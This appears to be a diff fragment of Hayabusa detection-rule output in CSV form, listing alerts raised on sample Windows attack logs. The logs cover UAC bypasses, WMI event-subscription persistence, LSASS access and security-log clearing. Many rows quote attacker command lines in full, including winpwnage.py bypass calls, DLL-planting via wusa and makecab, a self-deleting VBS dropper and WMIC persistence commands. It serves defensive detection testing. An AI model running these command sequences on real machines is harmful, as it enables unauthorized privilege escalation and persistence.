+2019-05-09 11:52:18.969 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:19.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:21.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Windows\System32\wscript.exe C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp   :  Path: C:\Windows\System32\makecab.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:21.265 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:21.281 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe""  C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:21.297 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:21.594 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:23.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  /C ""echo Dim objShell:Dim oFso:Set oFso = CreateObject(""Scripting.FileSystemObject""):Set objShell = WScript.CreateObject(""WScript.Shell""):command = ""powershell.exe"":objShell.Run command, 0:command = ""C:\Windows\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest"""""""""":objShell.Run command, 0:Set objShell = Nothing > ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs""""  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:23.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  /C ""C:\Windows\wscript.exe ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs""""  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 12:25:24.896 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe""   :  Path: C:\Windows\System32\sdclt.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx
+2019-05-09 12:25:25.067 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe""  /name Microsoft.BackupAndRestoreCenter  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx
+2019-05-09 12:25:25.067 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx
+2019-05-10 21:21:57.077 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u uac -i 7 -p c:\Windows\System32\cmd.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx
+2019-05-10 21:22:08.465 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\users\ieuser\appdata\local\temp\system32\mmc.exe"" ""c:\users\ieuser\appdata\local\temp\system32\perfmon.msc""  :  Path: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\perfmon.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx
+2019-05-10 22:32:48.200 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u uac -i 9 -p c:\Windows\System32\cmd.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:32:58.549 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\CompMgmtLauncher.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:33:29.424 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami  /priv  :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""c:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:33:29.424 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:33:29.424 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:33:29.424 +09:00,IEWIN7,1,high,Run Whoami Showing Privileges,,rules/sigma/process_creation/win_whoami_priv.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:49:29.586 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
+2019-05-10 22:49:39.930 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
+2019-05-10 22:49:40.164 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
+2019-05-10 22:49:45.133 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe""   :  Path: C:\Windows\System32\cliconfg.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
+2019-05-10 22:49:45.378 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe""   :  Path: C:\Windows\System32\cliconfg.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
+2019-05-11 18:50:08.248 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:13.494 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab  :  Path: C:\Windows\System32\makecab.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:18.404 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:18.654 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:26.779 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe""   :  Path: C:\Windows\ehome\Mcx2Prov.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:27.018 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe""   :  Path: C:\Windows\ehome\Mcx2Prov.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-12 01:46:10.125 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
+2019-05-12 01:46:15.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab  :  Path: C:\Windows\System32\makecab.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
+2019-05-12 01:46:20.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
+2019-05-12 01:46:20.828 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
+2019-05-12 01:54:02.071 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
+2019-05-12 01:54:07.508 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab  :  Path: C:\Windows\System32\makecab.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
+2019-05-12 01:54:12.493 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
+2019-05-12 01:54:12.821 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
+2019-05-12 02:10:06.342 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
+2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,informational,Logon Type 9 - NewCredentials,User: IEUser  :  Workstation:   :  IP Address: ::1  :  Port: 0  :  LogonID: 0x1bbdce  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
+2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
+2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
+2019-05-12 02:28:17.176 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:28:19.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmstp.exe"" /au c:\users\ieuser\appdata\local\temp\tmp.ini  :  Path: C:\Windows\System32\cmstp.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:28:19.567 +09:00,IEWIN7,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:28:22.598 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\windows\System32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:28:22.598 +09:00,IEWIN7,13,high,CMSTP Execution Registry Event,,rules/sigma/registry_event/sysmon_cmstp_execution_by_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:28:22.598 +09:00,IEWIN7,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:57:49.903 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u elevate -5 -p c:\Windows\System32\cmd.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:22.809 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:23.215 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer CREATE Name=""BotConsumer23"", ExecutablePath=""c:\Windows\System32\cmd.exe"", CommandLineTemplate=""c:\Windows\System32\cmd.exe""  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:23.340 +09:00,IEWIN7,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:23.418 +09:00,IEWIN7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:23.450 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name=""BotFilter82""', Consumer='CommandLineEventConsumer.Name=""BotConsumer23""'  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:23.590 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter CREATE Name=""BotFilter82"", EventNameSpace=""root\cimv2"", QueryLanguage=""WQL"", Query=""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'""  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:39.746 +09:00,IEWIN7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:50.090 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:54.887 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer WHERE Name=""BotConsumer23"" DELETE  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
